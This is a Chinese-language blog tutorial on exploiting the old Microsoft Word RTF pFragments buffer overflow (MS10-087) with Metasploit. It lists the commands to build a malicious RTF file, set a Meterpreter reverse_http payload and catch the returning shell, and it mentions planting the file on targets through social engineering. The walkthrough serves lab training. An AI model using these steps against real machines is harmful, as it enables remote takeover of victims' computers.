基于office渗透(MS10-087 Office(word)渗透攻击)

MS10-087 Office(word)渗透攻击

简介

如果用户打开或预览特制的RTF电子邮件,则最严重的漏洞可能允许远程执行代码。成功利用这些漏洞中的任何一个的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。

低版本的word版本会出现RTF文件漏洞。

漏洞:microsoft word中的RTF分析器中的pFragments属性容易受到栈缓存区溢出攻击

受影响的系统:Microsoft Office XP SP,2003 SP3,2007 SP2,2010 x32,2010 x64,Microsoft Office for

启动msf

命令:msfconsole

img

搜索MS10_087漏洞

命令:search ms10_087

img

使用攻击模块

命令::use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

img

设置恶意文件

命令:set FILENAME ms10087.rtf

img

设置payload

命令:set payload windows/meterpreter/reverse_http

img

设置用于接受从目标机弹回的shell

img

开始攻击

命令:run

img

将/home/jack/.msf4/local/ms10087.rtf下的文件传到靶机上

现实中我们可以利用社会工程学的知识传到目标机上,在这里我们直接上传上去

进入multi/handler模块

img

设置payload

命令:set payload windows/meterpreter/reverse_http

img

设置用于接受从目标机弹回的shell

img

开始攻击

命令:run

shell

[外链图片转存中…(img-aq7Vliaz-1674722518515)]

开始攻击

命令:run

img

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值